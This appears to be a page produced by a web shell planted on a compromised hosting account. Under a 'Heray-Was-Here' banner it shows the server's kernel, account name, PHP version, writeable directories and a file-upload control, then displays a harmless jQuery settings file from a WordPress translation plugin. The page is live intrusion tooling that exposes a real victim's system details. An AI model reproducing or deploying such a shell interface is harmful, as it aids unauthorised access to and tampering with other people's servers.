Heray-Was-Here
Server : Apache
System : Linux hybrid3195.ca.ns.planethoster.net 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User : alliancerealtynb ( 1004)
PHP Version : 7.4.33
Disable Function : noop
Directory :  /home/alliancerealtynb/wpml-string-translationOLD/res/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/alliancerealtynb/wpml-string-translationOLD/res/js/settings.js
/*jshint devel:true */
/*global jQuery */
var WPML_String_Translation = WPML_String_Translation || {};

WPML_String_Translation.Settings = function () {
	"use strict";

	var self = this;

	self.updateTrackStringWarning = function (event) {
		var warning = jQuery('.js-track-strings-note');
		if (jQuery(this).prop('checked')) {
			warning.fadeIn();
		} else {
			warning.fadeOut();
		}
	};


	jQuery(document).ready(function () {
		jQuery('#track_strings').on('click', self.updateTrackStringWarning);
	});

};

WPML_String_Translation.settings = new WPML_String_Translation.Settings();

Hry